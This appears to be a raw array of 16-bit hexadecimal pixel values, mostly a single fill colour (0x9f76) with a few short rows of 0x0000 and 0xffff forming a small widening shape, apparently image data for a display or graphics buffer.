0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 